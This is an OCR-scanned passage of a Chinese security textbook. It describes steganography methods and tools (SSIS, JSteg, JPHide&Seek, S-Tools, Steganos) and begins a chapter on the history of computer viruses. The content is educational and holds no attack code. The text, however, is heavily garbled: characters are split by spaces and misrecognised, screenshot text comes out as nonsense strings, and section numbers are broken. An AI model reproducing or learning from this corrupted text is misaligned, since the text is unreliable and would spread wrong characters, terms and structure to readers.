信息 与 一 个 伪 随 机 序列 进行 调制 ,然后 三 加 在 载体 上 。 扩 展 倍数 是 一 个 称 为 片 率 的 常量 , 跳 
频 是 载体 信号 的 频率 从 一 个 频率 向 另 一 个 频率 进行 跳 变 。 

Marvel 等 提出 一 个 称 作 SSIS 的 隐 写 系统 ,其 使 用 扩 频 技术 作为 岩 入 函数 ,原理 是 : 典 
入 处 理 前 ,使 用 传统 对 称 密 钥 方案 对 秘密 消息 进行 加 密 , 使 用 的 密 钥 记 为 。 接 着 ,将 采用 
低速 纠 错 编 码 对 加 密 的 秘密 信息 进行 编码 (如 RS 码 )。 这 一 步 将 提高 整个 系统 的 稳健 性 。 
然后 用 一 个 伪 随机 序列 对 获得 的 编码 信息 进行 调制 ,这 个 伪 随 机 序列 由 一 个 使 用 作为 种 
子 的 伪 随 机 序列 发 生 器 产生 。 处 理 后 的 信号 输入 到 混 秋 器 中 交织 (使 用 ks 作 种 子 ) ,然后 附 
加 在 载体 上 。 最 后 对 隐 写 图 像 适当 量化 。 接 收 方 提取 过 程 与 做 和 过程 相 反 。SSIS 使 用 一 
种 图 像 恢 复 技术 得 到 原始 图 像 的 一 个 估计 值 , 如 自 适应 Wiener 滤波 器 。 从 得 到 的 原始 图 像 
估计 值 中 减 去 隐 写 图 像 ,得 到 一 个 调制 和 扩展 的 隐 写 信息 的 估计 值 。 然 后 对 获得 的 位 利用 
As ,ko 解 交织 。 最 后 用 ki 对 秘密 信息 解密 。 由 于 Wiener 滤波 器 的 性 能 较 差 , 重 构 的 秘密 信 
息 可 能 含 错误 位 ,因此 这 个 隐 写 系统 可 看 作 在 一 个 含 噪声 信道 中 信息 传输 。 纠 错 编码 的 使 
用 有 益 于 恢复 破坏 的 信息 位 。 

和 密码 编码 及 密码 分 析 一 样 ,隐秘 通信 及 其 检测 也 是 一 对 矛盾 的 对 应 方 。 正 是 隐 写 检 
测 技 术 的 不 断 发 展 ,推动 了 隐秘 通信 技术 的 不 断 进步 。 三 种 不 同 的 隐秘 通信 手段 (基于 网 络 
协议 、 基 于 密码 协议 和 基于 图 像 音频 技术 ) 各 有 其 应 用 领域 和 检测 手段 。 当 前 的 隐秘 通信 研 
究 和 应 用 主要 集中 在 基于 图 像 和 音频 的 隐藏 算法 上 ,信息 隐藏 软件 使 用 的 主流 技术 是 空域 
LSB 隐藏 。 这 种 技术 在 先进 的 检测 算法 面前 暴露 了 种 种 弱点 ,而 且 稳 健 性 也 稍 差 。 随 着 技 
术 的 发 展 , 隐 写 软件 主流 技术 采用 空域 LSB 隐藏 和 变换 域 隐 写 相 结合 的 趋势 越 来 越 明显 ， 
而 针对 现 有 隐藏 检测 技术 开发 出 来 的 变换 域 一 阶 统计 补偿 隐 写 算法 ,更 是 公认 为 目前 最 安 
全 的 算法 。 

隐 写 算法 安全 性 和 容量 之 间 是 一 对 永恒 的 矛盾 ,如 何 找到 它们 之 间 的 平衡 点 ,也 是 算法 
设计 者 和 使 用 者 需要 认真 考虑 的 问题 。 


4.5 信息 隐藏 应 用 软件 


45.1 JSteg 软件 


JSteg 软件 由 Derek Upham 在 JG(Independent JPEG Group) 的 基础 上 开发 。 该 软件 
虽然 比较 早 , 仍 不 失 为 一 款 经 典 软件 , 它 是 世界 上 第 一 个 变换 域 隐 写 工具 。 至 今 仍 得 到 广泛 
使 用 并 成 为 科研 机 构 的 主要 研究 目标 之 一 。 

JSteg 的 算法 采用 在 DCT 量化 系数 LSB 嵌入 的 方法 ,LSB 嵌入 过 程 界 于 JPEG 量化 和 
编码 之 间 。 从 图 像 头 部 开始 连续 改变 DCT 系数 (但 是 保持 直流 分 量 及 交流 中 0 与 1) ,Dos 
版 本 不 支持 加 密 和 在 隐 写 空间 随机 嵌入 。JSteg 软件 使 用 如 图 4.7 所 示 的 数据 格式 。 


1 A | BBB “BIlCCCCCCCCCEe 于 
+---+------- -=-- + 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 -一 一 


4.7 JSteg 的 数据 格式 
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其 中 ,“A” 是 5 位 ,表示 B 的 长 度 , 按 高 位 在 前 的 次 序 表达 。“B” 是 0 一 31 位 ,表示 嵌入 
隐 写 信息 的 长 度 .“C? 为 嵌入 的 隐 写 信息 正文 。 
JSteg 目前 有 两 个 版 本 : JSteg DOS 版 本 (有 Linux 源码 ) 和 由 Korejwa 改写 的 
Windows 版 本 JSteg Shell 2. 0。JSteg Shell 2. 0 对 JSteg 的 操作 进行 了 窗口 化 ,实质 还 是 调 


用 了 JSteg 的 核心 程序 Cjepg 与 Djpeg( 可 以 在 JSteg Shell 的 安装 目录 下 看 到 这 两 个 可 执行 
文件 ) 。 只 是 在 调用 隐 写 之 前 和 之 后 ,相应 的 进行 了 加 密 和 解密 处 理 


图 4. 8 一 图 4. 11 所 示 。 


。 信 息 隐藏 操作 步骤 如 


打开 可 执行 程序 JSteg Shell 2.0, 在 如 图 4. 8 所 示 界 面 中 选中 Hide File in JPG Image， 


单 击 Next 按钮 ,弹出 如 图 4. 9 所 示 界 面 。 


Ma JSteg Shell 2.0 


4 Welcome to Steg Shel 20 lor Windows 
1 


John Koreiwa <koreiwaGwiac neb 
Pn ether 


5 Hide File n JPG Image 
Emract Fie From JPG Image 


Select the pe to be hidden wihin a JPG file, 


File to Hide 


HMy Documents\My Fn | 


克 Remenber FleName 


厂 Eneypt Wih Passphrase 


<<Back | Nex>> | | 


图 4.8 ”软件 起 始 界面 图 4.9 信息 隐藏 第 二 步 操作 

在 图 4. 9 中 的 File to Hide 区 域 中 , 单 击 Find 按钮 ,并 选择 要 隐藏 的 文件 ,选中 
Remember FileName 复 选 框 。 然 后 单 击 Next 按钮 ,弹出 如 图 4. 10 所 示 界 面 。 

在 图 4. 10 所 示 界 面 中 的 Carrier File 区 域 中 单 击 Find 按钮 ,并 选择 载体 文件 ,选中 Set 


Compression Quality 复 选 框 ( 可 以 对 图 像 压缩 质量 )。 然 后 单 击 Next 按钮 ,弹出 如 图 4. 11 
所 示 界 面 。 


147.283 bytes ave ready to be hidden 118 bytes successtuly hidden in "dogipg 

Select the JPG fle to hvde this data n. de en mp he 
Carrier File Save Output JPG File As 

[EM Documents My Fm | [Deoshels dooT po ED 
厂 Set Compression Qualty Hidder testbd 

厂 Appy Smoothing Encyphor None 

厂 Grey5cae Dutput oops pe 


厂 0pimize Hufiman Table 


克 Keep Oignal Carier Date and Time 。 Launch 


Cancel | <<Back | Nex>> | | 


Back | Fnish | 


图 4.10 信息 隐藏 第 三 步 操作 图 4.11 信息 隐藏 第 四 步 操作 


在 如 图 4. 11 所 示 界 面 中 的 Save Output JPG File As 区 域 中 , 单 击 Find 按钮 ,并 选择 带 
有 秘密 信息 的 文件 ,选中 Keep Original Carrier Date and Time 复 选 框 (保持 原 载体 文件 的 
日 期 和 时 间 )。 然 后 单 击 Finish 按钮 ,完成 信息 嵌入 ,生成 携 密 文件 。 

由 于 JSteg Shell 2. 0 只 是 对 JSteg 的 操作 进行 了 窗口 化 ,核心 仍然 是 调用 CJPEG 和 
DJPEG 两 个 程序 ,因此 从 DOS 窗口 中 使 用 DJPEG 命令 可 以 完成 信息 提取 。 


到 
络 与 信息 安全 基础 


在 JSteg DOS 版 本 下 ,用 户 在 DOS 窗口 中 ,输入 “djpeg-steg testl. txt dogl. jpg dog2. jpg”， 
生成 testl. txt 文件 ,可 实现 信息 提取 。 


452 JPHide&Seek 


JPHide&.Seek(JPHS) 是 Allan Latham 开发 的 用 于 在 JPEG 文件 中 隐藏 信息 的 隐 写 软 
件 , 可 以 将 文件 隐藏 到 JPG 格式 图 像 中 并 提取 出 来 。 和 JSteg 一 样 ,该 软件 也 是 科研 机 构 主 
要 研究 目标 之 一 。 它 有 0.3( 有 Linux 源码 ) 和 0.5(Windows 版 ) 两 个 版 本 。 与 0. 3 版 本 相 
比 ,0. 5 版 本 在 加 密 前 还 增加 了 压缩 选项 。 

图 4. 12 和 图 4. 13 显示 出 了 0.3 与 0.5 版 本 的 信息 头 格式 : 其 中 V1~V5 或 V7 表示 
对 第 一 块 DCT 前 8 个 系数 对 256 取 模 进行 加 密 后 保存 的 48 位 或 64 位 。 
oot Meals | pene os | Ene pn i 


IV2 | IV3 IV4 IV5 
本 


图 4.12 JPHide&Seek 0. 3 版 本 信息 头 格式 


Compressed length bits 23-0 Mode 
本 本 本 高 本 本 | sl hs Ld 
Orig.Len.bits 23-16 IV1 IV2 IV3 
ener | WN TE Ml Tf 1 EO PE | [i 
Orig.Len.bits 7-0 
ddd dl 


Orig.Len.bits 15-8 | Compressed length bits 15-0 
:| We MY: EP EM 3 l= bs 
IV4 1s IV6 IV7 


图 4.13 JPHide&Seek 0. 5 版 本 信息 头 格式 


JPHS 使 用 加 密 算法 RC4-40, 通 过 口令 实现 简单 加 密 , 具 有 非常 好 的 隐蔽 性 能 。 软 件 
要 求 隐藏 信息 量 不 超过 隐秘 载体 的 10%。 可 以 隐藏 Word、PDF、ZIP 等 格式 的 文件 ,但 需要 
收 件 人 和 发 件 人 事先 协商 好 。 有 报道 说 美 联 社 在 其 网 站 上 发 布 的 照片 均 采 用 JPHIDE 嵌 
入 数字 水 印 以 保护 版 权 。 

JPHS 使 用 Blowfish 算法 生成 一 个 伪 随 机 序列 发 生 器 ,用 它 来 确定 隐藏 信息 位 在 图 片 
中 的 存储 位 置 ,这 样 做 会 增加 视觉 信息 中 的 随机 噪声 。 虽 然 是 在 LSB 隐 写 ,但 是 JPHS 并 
不 是 从 JPEG 编码 数据 开始 就 连续 选择 DCT 系数 进行 信息 隐藏 (包括 直流 成 分 也 嵌入 , 事 
实 上 ,JPHS 总 是 首先 在 直流 分 量 里 隐 写 ) ,同时 嵌入 过 程 中 对 于 系数 0 或 士 1 也 是 由 与 密 钥 
相关 的 参数 控制 是 否 跳 过 。 它 使 用 了 一 个 固定 的 表 , 定 义 了 用 于 修改 DCT 系数 顺序 的 类 
别 。 表 中 包含 3X256 个 元 素 , 每 3 个 元 素 确定 一 个 DCT 块 从 64 个 系数 中 选 哪 一 个 ,确定 
是 哪个 RGB 中 的 哪个 成 分 ,确定 0.1、 一 1 隐 写 规则 。 在 采用 下 一 个 类 别 的 DCT 系数 之 前 ， 
当前 类 别 的 DCT 系数 完全 用 于 信息 隐藏 。 在 JPHIDE 算法 的 实现 中 ,即使 所 有 待 隐藏 信 
息 都 已 经 嵌入 完毕 ,但 隐藏 过 程 在 当前 类 别 的 系数 中 还 会 连续 进行 。 例 如 ,在 该 表 中 第 一 类 
系数 便 是 颜色 组 件 0(Color Component Zero) 的 DC 系数 ,一 幅 640X480 的 JPEG 图 像 中 大 
概 含有 5000 个 DCT 系数 ,即使 待 隐 藏 的 信息 只 有 8 位 ,JPHIDE 算法 也 会 修改 此 图 像 中 所 
有 5000 个 DCT 系数 。 该 算法 不 仅 修改 了 DCT 系数 的 最 低位 (LSB) ,而 且 也 可 以 修改 次 低 
位 ( 即 LSB 位 的 相 邻 比特 位 )。 而 且 JPHIDE 算法 使 用 了 一 个 伪 随 机 数 发 生 器 决定 跳 过 某 
些 DCT 系数 ,此 概率 ( 指 跳 过 位 概率 ) 取 决 于 待 隐 藏 信息 的 总 长 度 和 已 经 嵌入 的 信息 位 数 。 


此 外 ,隐藏 嵌入 的 信息 位 采用 BLOWFISH 算法 进行 加 密 处 理 。 

JPHS 0.5 版 的 信息 隐藏 界面 如 图 4. 14 所 示 。 打 开 Open jpeg 菜单 ,在 弹出 的 打开 文 
件 窗口 中 选择 一 个 JPEG 文件 。 然 后 单 击 Hide 按钮 ,在 弹出 窗口 中 输入 密码 ,也 可 以 不 设 
密码 ,直接 单 击 OK 按钮 ,并 在 文件 窗口 中 选择 要 隐藏 的 文件 (注意 文件 大 小 不 要 超过 
JPEG 文件 大 小 的 10%)。 单 击 Save jpeg 选项 ,进行 同名 保存 ,程序 会 覆盖 原来 的 JPEG 文 
件 , 如 果 单 击 Save jpeg as 选项 , 则 会 另存 为 新 的 文件 。 


Inputjpeg file 
Fiename 


Filesize kb Widh pixels Height 
Approximale max capaciy Kb recommended limit 


Hiddenfile 


Directory 
Filename 


Filesize 


Saved jpeg fle 
Directory 

Filename 

Filesize kb 


Nojpegfle has been opened 


4.14 JPHS 0.5 软件 界面 


如 果 要 提取 信息 , 则 单 击 Open jpeg 选项 ,在 弹出 的 打开 文件 窗口 中 选择 一 个 可 能 有 隐 
藏 信息 的 JPEG 文件 。 单 击 Seek 选项 ,在 弹出 窗口 中 输入 密码 (必须 与 信息 嵌入 过 程 中 输 
入 的 密码 一 致 )。 然 后 输入 文件 名 保存 提取 出 的 秘密 文件 。 


453 S-Tools 


S-Tools 是 Andrew Brown 于 1996 年 采用 VC4 的 MFC 开发 的 针对 图 像 与 声音 文件 
的 隐 写 工具 。S-Tools 算法 采用 了 在 整个 隐 写 空间 使 用 LSB 随机 扩散 嵌入 的 方法 ,将 信息 
隐藏 在 BMP 或 GIF 图 像 文件 中 ,也 可 以 隐藏 在 WAV 声音 文件 中 ,嵌入 之 前 可 以 压缩 隐藏 
信息 (可 选 ), 进行 加 密 处 理 ( 必 选 )。 它 支持 的 加 密 方法 包括 IDEA、DES 和 3DES 等 。 
S-Tools 根据 输入 的 密码 生成 一 个 秘密 安全 的 伪 随 机 数 发 生 器 ,并 使 用 它 的 输出 来 选择 秘 
密 数 据 的 下 一 个 隐藏 位 置 。 确 定 秘密 数据 的 隐藏 位 置 后 ,S-Tools 根据 秘密 数据 修改 字 节 
的 最 低位 (即将 秘密 数据 戏 和 人 载体 某 些 字 节 的 最 低位 中 ) 实 现 信息 的 隐藏 。 

采用 S-Tpols 在 调 色 板 图 像 中 嵌入 信息 后 , 原 有 的 调 色 板 颜 色 值 和 调 色 板 的 顺序 发 生 了 
改变 。 对 于 给 定 的 一 个 原始 调 色 板 图 像 F(z,y) ,采用 S-Tools 嵌入 后 ,隐秘 图 像 f(x,y) 将 
减少 原 有 的 调 色 板 颜 色 值 数量 ,产生 多 个 独立 颜色 值 w;, 且 每 个 w; 形成 8 个 颜色 值 的 组 
EE;,w; EE;, 通 常 1 二 i 过 32, 且 有 E; 中 的 颜色 值 满足 : 

E:={z||lz—w|l<l,rE RXGXB,wE RXGXB}, |E:|=8 
当 采 用 S-Tools 嵌入 到 256 色 灰 度 图 像 中 ,S-Tools 将 灰 度 图 像 改变 为 彩色 图 像 ,但 是 
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由 于 每 个 组 E 中 的 颜色 值 相 差 很 小 ,人 的 视觉 是 无 法 分 辨 的 。 图 4. 15 给 出 了 一 个 在 灰 度 
图 像 中 采用 S-Tools 嵌入 信息 后 的 调 色 板 特征 。 每 个 对 立 的 颜色 值 构成 了 一 个 调 色 板 项 
组 ,项 组 内 的 颜色 值 之 间 的 差 值 均 不 超过 1, 且 调 色 板 中 的 颜色 值 不 恒 满 足 R=G= B。 
S-Tools 软件 界面 如 图 4. 16 所 示 。 


D S-Toots -LION.BMP 


MA212 213 213 2 调 色 板 项 组 


图 4.15 S-Tools 嵌入 灰 度 图 像 的 图 4.16 S-Tools 软件 界面 
调 色 板 ( 已 排序 ) 


需要 隐藏 信息 时 ,将 载体 文件 a. wav 拖 到 程序 窗口 中 ,如 图 4.17 所 示 。 


Actions [5 ID 


图 4.17 WAYV 载体 隐藏 信息 过 程 1 


将 秘密 文件 test. txt 拖 到 a. wav 窗口 中 ,会 弹出 窗口 ,要 求 输入 密码 并 选择 加 密 算法 ， 
单 击 OK 按钮 ,如 图 4. 18 所 示 。 

最 后 生成 一 个 携 密 文件 ,在 窗口 上 右 击 并 选择 Save As 菜单 项 ,保存 为 al. wav。 分 别 
播放 al. wav 与 a. wav 两 个 文件 ,分 辨 不 出 它们 的 区 别 , 如 图 4. 19 所 示 。 

提取 信息 时 ,将 可 能 载 有 秘密 信息 的 文件 al. wav 拖 到 软件 窗口 中 ,在 打开 的 al. wav 
窗口 上 右 击 ,选择 Reveal 菜单 项 ,弹出 密码 验证 窗口 ,如 图 4. 20 所 示 。 

在 图 4. 20 所 示 界 面 中 输入 密码 ,选择 加 密 算法 (必须 与 信息 嵌入 过 程 中 输入 的 密码 和 
算法 一 致 ) , 单 击 OK 按钮 ,弹出 如 图 4. 21 所 示 界 面 。 


77 
第 4 章 信息 隐藏 技 


加 可 二 | ve FE 


can held up to 113, 1 bytes 


4.18 WAYV 载体 隐藏 信息 过 程 2 


Actions 


can hold up to 113,961 bytes 


4.20 ”WAYV 载体 提取 信息 过 程 1 


在 图 4. 20 中 ,Test. txt 就 是 提取 出 的 秘密 信息 .在 Test. txt 上 右 击 ,选择 Save As 选 
项 ,将 提取 出 的 秘密 文件 保存 为 testl. txt, 完 成 信息 提取 过 程 。 
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Actions | | 


图 4.21 WAYV 载体 提取 信息 过 程 2 
454 Steganos Security Suite 2006 


Steganos Security Suite 2006 是 一 个 著名 的 商业 软件 ,提供 文件 加 密 、 隐 藏 . 撕 碎 , 硬 盘 
加 密 与 隐藏 ,邮件 加 密 等 10 种 用 户 私密 保护 。 相 对 于 早期 版 本 ,该 软件 不 论 是 从 功能 上 还 
是 从 自动 化 程度 上 都 有 很 大 改善 和 提高 。 它 主要 有 以 下 几 大 功能 。 

OO Steganos Safe: 主要 用 于 保护 敏感 数据 。 单 击 Safe 图 标 ,可 以 设置 安全 驱动 器 , 即 
对 目标 磁盘 进行 数据 加 密 , 使 目标 磁盘 看 起 来 就 像 加 密 硬盘 。 被 保护 的 数据 必须 使 用 口令 、 
USB 设备 或 具备 ActiveSync 功能 的 智能 电话 通过 蓝牙 或 其 他 无 线 技术 才能 打开 。 

@ Steganos AntiSpyware: 它 能 检测 并 清除 掉 约 100 000 个 有 害 程序 ,如 广告 程序 、 间 
谍 软 件 。Steganos Shredder 则 可 以 不 留 痕迹 地 销毁 敏感 数据 。 

@ 256 位 AES(Advanced Encryption Standard, 是 美国 国家 标准 与 技术 研究 所 用 于 加 
密 电子 数据 的 规范 ) 实 时 加 密 。 

@ 上 网 踪迹 清除 : 能 清除 多 达 200 种 用 户 的 行为 痕迹 .包括 上 网 和 工作 活动 .历史 记 
录 、AIM 和 其 他 即时 通信 、Google 工具 调和 桌面 搜索 、 最 近 使 用 的 文件 和 Media Player 播 
放 列 表 。 永 久 删 除 文件 则 需要 使 用 Shredder 工具 。 

@ 私密 收藏 夹 : 使 用 口令 保护 收藏 夹 中 的 网 站 信息 。 

@ 口令 管理 : 所 有 口令 都 进行 了 加 密 , 且 可 以 根据 用 户 需 要 自动 输入 。 

@ 隐 写 : 将 敏感 信息 隐藏 在 图 像 和 音乐 中 。 

E-mail 加 密 : 能 创建 高 安全 性 的 自 解密 E-mail。 

Steganos Security Suite 2006 的 隐 写 工具 适用 的 载体 文件 类 型 为 BMP、WAV 、JPEG。 
对 于 要 隐藏 的 信息 , 它 首先 用 AES 算法 进行 加 密 。 然 后 根据 载体 类 型 的 不 同 而 使 用 不 同 的 
信息 隐藏 算法 。Steganos 与 F5 算法 的 不 同 点 是 : 在 隐藏 信息 前 ,Steganos 先 计 算 最 大 隐藏 
容量 ,然后 将 最 大 隐藏 容量 的 30% 作 为 隐蔽 性 阀 值 。 高 于 此 值 , 则 视 作 隐 藏 信息 容易 被 发 
现 , 软 件 拒绝 向 载体 文件 写 入 。 只 有 当 信 息 长 度 不 超过 最 大 隐藏 容量 的 30% 时 才 隐 藏 信 
息 ,增强 了 安全 性 。Steganos Security Suite 2006 软件 的 起 始 界面 如 图 4. 22 所 示 。 

在 使 用 Steganos Security Suite 2006 软件 进行 信息 隐藏 时 ,首先 单 击 File Manager 工 
具 , 弹 出 信息 隐藏 操作 窗口 ,如 图 4. 23 所 示 。 
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图 4.22 Steganos Security Suite 2006 起 始 界 面 


团 Steganos File Manager =Io| x| 


Steganos File Manager 


图 4.23 信息 隐藏 操作 窗口 


在 信息 隐藏 操作 窗口 中 ,选择 File| New encrypted file 选项 ,弹出 如 图 4. 24 所 示 界 面 。 
在 信息 隐藏 输入 窗口 中 ,选择 Actions|Add file 选项 或 Add Folder 选项 ,弹出 文件 对 话 
框 ， 添加 要 隐藏 的 文件 或 文件 夹 。 如 果 需 要 隐藏 的 信息 文件 添加 完毕 , 则 单 击 窗口 工具 栏 左 
边 第 二 个 按钮 ,弹出 如 图 4. 25 所 示 的 对 话 框 ,提示 是 否 保 存 隐 秘 文 件 。 
在 信息 隐藏 操作 提示 对 话 框 中 ,如 果 单 击 Yes 按钮 ,或 者 在 需要 隐藏 的 信息 文件 添加 
完毕 后 选择 File| Close encrypted file 选项 , 则 弹出 如 图 4. 26 所 示 对 话 框 ,为 用 户 提供 两 
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BW steganos File Manager - Untitled 


图 4.24 信息 隐藏 输入 窗口 


项 Steganos File Manager 


CEI | ceo | 


图 4.25 信息 隐藏 操作 提示 对 话 框 1 


Manager 


Do you want to only encrypt your files or do you want to hide them as wel? 


Note: In order to hide data you need a carrier fie (mage or sound) that can be used 
to hold the hidden data. 


{Encrypt files 
C Hide and encrypt fles 


图 4.26 信息 隐藏 操作 提示 对 话 框 2 
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种 选择 : Encrypt files( 仅 加 密 文 件 ) 和 Hide and encrypt files( 隐 藏 并 加 密 文 件 ) 。 前 者 和 信 
息 隐 藏 无 关 , 本 书 不 再 作 详细 介绍 。 如 果 选 中 后 者 , 单 击 Next 按钮 , 则 弹出 如 图 4. 27 所 示 
对 话 框 。 上 方 选项 提示 用 户 自 动 搜索 载体 文件 ,下 方 选 项 提示 用 户 自 己 选择 载体 文件 。 用 
户 可 以 根据 需要 进入 相应 的 载体 文件 搜索 选择 界面 。 


Yo con seed 3n ehny cantiot Pe en eee Pe 
carrier file. 


(Search for appropriate carrier files automaticaly. 
© Select an existing carrier File 


加 ‘mk [CE cme | 
4.27 信息 隐藏 操作 提示 对 话 框 3 


选择 了 一 个 载体 文件 后 ,弹出 如 图 4. 28 所 示 口 令 输入 界面 ,用 户 可 以 根据 提示 输入 口 
令 ,完成 隐藏 过 程 。 


<Back et> | cncel | 


4.28 信息 隐藏 操作 提示 对 话 框 4 


(3 


提取 隐藏 信息 时 ,选择 File| Open encrypted file 选项 ,选择 载体 文件 后 ,弹出 如 图 4. 29 
所 示 对 话 框 ,在 Password 文本 框 中 输入 密码 ,窗口 中 即 显 示 所 隐藏 的 文件 列表 ,可 以 打开 
进行 查看 。 
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图 4. 29 提取 隐藏 信息 操作 提示 对 话 框 


Mo 
苞 


. 什么 是 信息 隐藏 ? 信息 隐藏 技术 主要 包括 哪 两 部 分 ? 

.信息 隐藏 主要 应 用 在 哪 几 方 面 ? 

. 国 下 信道 的 狭义 定义 是 什么 ?” 阅 下 信道 的 广义 定义 是 什么 ? 

. 文件 格式 BMP、GIF、JPEG 的 全 称 各 是 什么 ? 

. 信息 隐藏 技术 为 什么 被 国外 学 术 界 称 为 高 级 信息 安全 技术 ? 

. 信息 隐藏 主要 的 分 类 和 应 用 领域 是 什么 ?说 明 信 息 隐藏 于 数字 水 印 的 关系 。 
. 什么 是 隐 写 分 析 ? 其 主要 难点 在 哪里 ? 

使 用 信息 隐藏 的 商业 软件 的 一 般 操 作 步 骤 是 什么 ? 

. 网络 隐藏 通信 的 原理 是 什么 ? 
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CHAPTERS 


计算 机 病毒 及 防范 技术 第 5 章 


随 着 网 络 的 发 展 ,计算 机 病毒 有 了 更 多 的 传播 途径 。 目 前 很 多 网 站 上 都 
提供 各 类 病毒 与 黑客 软件 的 下 载 , 本 章 主要 介绍 了 病毒 的 起 源 和 发 展 以 及 病 
毒 的 分 类 ,最 后 着 重 介 绍 VBS 病毒 .蠕虫 病毒 .缓冲 区 溢出 病毒 和 木马 病毒 
的 原理 和 编写 特性 。 

本 章 要 点 如 下 : 

。 病毒 的 起 源 和 发 展 、 分 类 ; 

。 VBS 病毒 ; 

。 蠕虫 病毒 ; 

。 缓冲 区 溢出 病毒 

。 木马 病毒 。 


5.1 病毒 的 起 源 和 发 展 


病毒 几乎 无 处 不 在 ,一 台 没有 安装 任何 系统 补丁 和 软件 防火 墙 的 计算 
机 ,一 旦 接 人 互联 网 立刻 就 会 感染 病毒 ,而 病毒 的 发 展 也 达到 了 前 所 未 有 的 
地 步 ,病毒 的 功能 也 不 再 单一 ,很 多 病毒 在 开发 时 都 吸收 了 以 前 一 些 病毒 的 
特点 ,破坏 力 更 强 。 

谈 到 病毒 的 起 源 和 发 展 不 得 不 提 到 贝尔 实验 室 ,20 世纪 60 年 代 初 ,美国 
贝尔 实验 室 里 ,三 个 年 轻 的 程序 员 编写 了 一 个 名 为 “ 磁 芯 大 战 ? 的 游戏 ,游戏 
中 通过 复制 自身 来 摆脱 对 方 的 控制 ,这 就 是 病毒 的 第 一 个 雏形 。 

20 世纪 70 年 代 , 美 国 作家 雷 恩 在 (P1 的 青春 ) 一 书 中 阐述 了 一 种 能 够 自 
我 复制 的 计算 机 程序 ,并 第 一 次 称 之 为 “计算 机 病毒 ”。 

1983 年 11 月 ,在 国际 计算 机 安全 学 术 研讨 会 上 ,美国 计算 机 专家 首次 将 
病毒 程序 在 VAX/750 计算 机 上 进行 实验 ,世界 上 第 一 个 计算 机 病毒 就 这 样 
诞生 在 实验 室 中 。 

20 世纪 80 年 代 后 期 ,巴基斯坦 有 两 个 以 编 软件 为 生 的 兄弟 为 了 打击 资 
版 软件 ,设计 出 了 一 个 名 为 “巴基斯坦 智囊 ”的 病毒 ,该 病毒 只 传染 软盘 引导 
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区 。 这 就 是 在 世界 上 流行 的 第 一 个 真正 的 病毒 。 

1988 年 至 1989 年 ,我国 相继 出 现 了 能 感染 硬盘 和 软盘 引导 区 的 Stoned( 石 头 ) 病 毒 ,该 
病毒 体 代码 中 有 明显 的 标志 “Your PC is now Stoned!”“LEGALISE MARIJUANA!”, 也 
称 为 “大 麻 ” 病 毒 。 该 病毒 感染 软 硬 盘 0 面 0 道 1 扇 区 ,并 修改 部 分 中 断 向 量 表 。 该 病毒 不 
隐藏 也 不 对 自身 代码 加 密 , 所 以 很 容易 被 查 出 和 解除 。 类 似 这 种 特性 的 还 有 “小 球 ”、 
“Azusa/ Hong 一 Kong/2708” 和 Michaelangelo 等 病毒 ,这 些 都 是 从 国外 传染 进来 的 。 国 产 
的 有 Bloody .Torch 和 Disk Killer 等 病毒 ,实际 上 它们 大 多 数 是 Stoned 病毒 的 翻版 。 

20 世纪 90 年 代 初 ,感染 文件 的 病毒 有 Jerusalem( 黑 色 13 号 星期 五 )、YankeeDoole、 
Liberty、1575、Traveller、1465 、2062 和 4096 等 ,主要 感染 以 . com 和 . exe 为 后 级 的 文件 。 这 
类 病毒 修改 部 分 中 断 向 量 表 ,被 感染 的 文件 明显 的 增加 了 字 节 数 ,但 病毒 代码 主体 没有 加 
密 , 容 易 被 查 出 和 解除 。 这 些 病 毒 中 , 略 有 对 抗 反 病毒 手段 的 只 有 Yankee Doole 病毒 , 当 它 
发 现 用 户 用 Debug 工具 跟踪 时 ,自动 从 文件 中 逃走 。 

随后 ,又 有 一 些 能 对 自身 进行 简单 加 密 的 病毒 相继 出 现 , 有 1366 (DaLian)、1824 
(N64) ,1741(Dong) 和 1100 等 病毒 。 它 们 加 密 的 目的 主要 是 防止 跟踪 或 掩盖 有 关 特 征 。 

以 后 又 出 现 了 引导 区 ,文件 型 “双料 ?病毒 ,这 类 病毒 既 感 染 磁 盘 引 导 区 又 感染 可 执行 文 
件 ,常见 的 有 Flip/Omicron( 颠 倒 ) 、XqR(New century 新 世纪 ) Invader( 侵 入 者 )、Plastique 
(塑料 炸弹 )、3584 (郑州 ( 狼 ))、3072( 秋 天 的 水 )、ALFA/3072 一 2、Ghost/One_Half/3544 
(幽灵 )、Natas( 幽 灵 王 ) 和 TPVO/3783 等 ,如 果 用 户 只 解除 了 文件 上 的 病毒 ,而 没有 解除 硬 
盘 主 引导 区 的 病毒 ,系统 引导 时 又 将 病毒 调和 信 内存, 并 重新 感染 文件 。 同 样 如 果 用 户 只 解除 
了 主 引导 区 的 病毒 ,而 没有 解除 可 执行 文件 上 的 病毒 ,用 户 执 行 携带 病毒 的 文件 时 ,硬盘 主 
引导 区 将 再 次 被 感染 。 

Flip/Omicron、XqR 这 两 种 病毒 都 设计 有 对 抗 反 病 毒 技 术 的 手段 ,Flip( 颠 倒 ) 病 毒 对 其 
自身 代码 进行 随机 加 密 , 变 化 无 穷 , 使 绝 大 部 分 病毒 代码 与 前 一 被 感染 目标 中 的 病毒 代码 几 
乎 没有 三 个 连续 的 字 节 是 相同 的 。 该 病毒 在 主 引导 区 只 潜藏 少量 的 代码 ,病毒 自身 全 部 代 
码 潜藏 于 硬盘 最 后 6 个 扇 区 中 ,并 将 硬盘 分 区 表 和 DOS 引导 区 中 的 磁盘 实用 扇 区 数 减少 6 
个 扇 区 ,所 以 再 次 启动 系统 后 ,硬盘 的 实用 空间 就 减少 了 6 个 扇 区 。 这 样 , 原 主 引导 记录 和 
病毒 主 程序 就 保存 在 硬盘 实用 扇 区 外 ,避免 其 他 程序 的 覆盖 ,而 且 用 Debug 的 工 命令 也 不 
能 进行 查看 ,用 Format 进行 格式 化 也 不 能 解除 ,与 此 相似 的 还 有 Denzuko 病毒 。 

XqR(New century 新 世纪 ) 病毒 监视 着 Int13、Int21 中 断 的 有 关 参 数 , 当 用 户 要 查看 或 
搜索 被 其 感染 了 的 主 引导 记录 时 ,病毒 就 调换 出 正常 的 主 引 导 记 录 给 用 户 查 看 或 让 用 户 搜 
索 ,使 用 户 认为 一 切 正常 ,病毒 却 蒙混 过 关 。 病 毒 的 这 种 对 抗 方法 ,被 认为 具有 “ 反 转 ”功能 。 
这 类 病毒 还 有 Mask( 假 面具 )、2709/ROSE (玫瑰)、One_Half/3544 (项 灵 )、Natas/4744、 
Monkey、PC_LOCK .DIE_HARD/HD2、GranmaGrave/Burglar/1150 和 3783 等 ,现在 的 新 
